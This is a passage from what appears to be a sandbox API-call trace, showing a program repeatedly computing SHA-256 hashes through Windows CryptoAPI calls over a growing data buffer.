	[0187.486] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.487] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.487] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0187.487] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730110
	[0187.487] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2730110, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730110, pdwDataLen=0x128aac) returned 1
	[0187.487] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.487] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.487] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.487] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.487] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0187.487] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730138
	[0187.487] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2730138, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730138, pdwDataLen=0x128aac) returned 1
	[0187.487] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.487] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.487] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.488] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.488] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0187.488] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.488] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730160
	[0187.488] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2730160, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730160, pdwDataLen=0x128aac) returned 1
	[0187.488] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.488] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.488] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.488] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.488] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0187.488] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.488] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730188
	[0187.488] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2730188, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730188, pdwDataLen=0x128aac) returned 1
	[0187.488] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.489] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.489] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.489] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.489] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0187.489] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.489] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27301b0
	[0187.489] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x27301b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x27301b0, pdwDataLen=0x128aac) returned 1
	[0187.489] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.489] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.489] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.489] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.489] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0187.490] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.490] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27301d8
	[0187.490] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27301d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x27301d8, pdwDataLen=0x128aac) returned 1
	[0187.490] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.490] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.490] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.490] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.490] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0187.490] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.490] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730200
	[0187.490] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2730200, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730200, pdwDataLen=0x128aac) returned 1
	[0187.490] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.490] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.490] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.491] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.491] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0187.491] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.491] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730228
	[0187.491] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2730228, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730228, pdwDataLen=0x128aac) returned 1
	[0187.491] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.491] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.491] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.491] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.491] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0187.491] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.491] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730250
	[0187.491] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2730250, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730250, pdwDataLen=0x128aac) returned 1
	[0187.491] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.491] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.491] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.492] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.492] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0187.492] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.492] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730278
	[0187.492] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2730278, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730278, pdwDataLen=0x128aac) returned 1
	[0187.492] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.492] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.492] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.492] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.492] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0187.492] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.492] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27302a0
	[0187.492] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x27302a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x27302a0, pdwDataLen=0x128aac) returned 1
	[0187.492] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.492] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.492] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.493] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.493] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0187.493] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.493] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27302c8
	[0187.493] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27302c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x27302c8, pdwDataLen=0x128aac) returned 1
	[0187.493] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.493] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.493] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.493] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.493] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0187.493] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.493] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27302f0
	[0187.493] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x27302f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x27302f0, pdwDataLen=0x128aac) returned 1
	[0187.493] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.493] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.493] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.494] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.494] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0187.494] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.494] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730318
	[0187.494] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2730318, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730318, pdwDataLen=0x128aac) returned 1
	[0187.494] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.494] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.494] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.494] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.494] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0187.494] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.494] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730340
	[0187.494] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2730340, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730340, pdwDataLen=0x128aac) returned 1
	[0187.494] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.494] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.494] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.495] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.495] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0187.495] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.495] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730368
	[0187.495] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2730368, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730368, pdwDataLen=0x128aac) returned 1
	[0187.495] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.495] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.495] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.495] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.495] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0187.495] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.495] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730390
	[0187.495] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2730390, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730390, pdwDataLen=0x128aac) returned 1
	[0187.495] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.495] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.495] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.496] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.496] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0187.496] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.496] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27303b8
	[0187.496] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27303b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x27303b8, pdwDataLen=0x128aac) returned 1
	[0187.496] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.496] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.496] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.496] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.496] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0187.496] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.496] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27303e0
	[0187.496] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x27303e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x27303e0, pdwDataLen=0x128aac) returned 1
	[0187.497] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.497] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.497] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.497] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.497] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0187.497] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.497] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730408
	[0187.497] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2730408, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730408, pdwDataLen=0x128aac) returned 1
	[0187.497] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.497] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.497] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.498] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.498] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0187.498] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730430
	[0187.498] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2730430, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730430, pdwDataLen=0x128aac) returned 1
	[0187.498] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.498] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.498] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.498] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.498] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0187.498] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.498] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730458
	[0187.498] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2730458, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730458, pdwDataLen=0x128aac) returned 1
	[0187.498] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.498] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.498] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.499] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.499] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0187.499] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.499] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2730480
	[0187.499] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2730480, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2730480, pdwDataLen=0x128aac) returned 1
	[0187.499] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.499] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.499] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.499] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.499] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0187.499] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.499] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27304a8
	[0187.499] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x27304a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x27304a8, pdwDataLen=0x128aac) returned 1
	[0187.499] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.499] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.499] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.500] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.500] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0187.500] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.500] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x262ee8
	[0187.500] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x262ee8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x262ee8, pdwDataLen=0x128aac) returned 1
	[0187.500] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.500] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
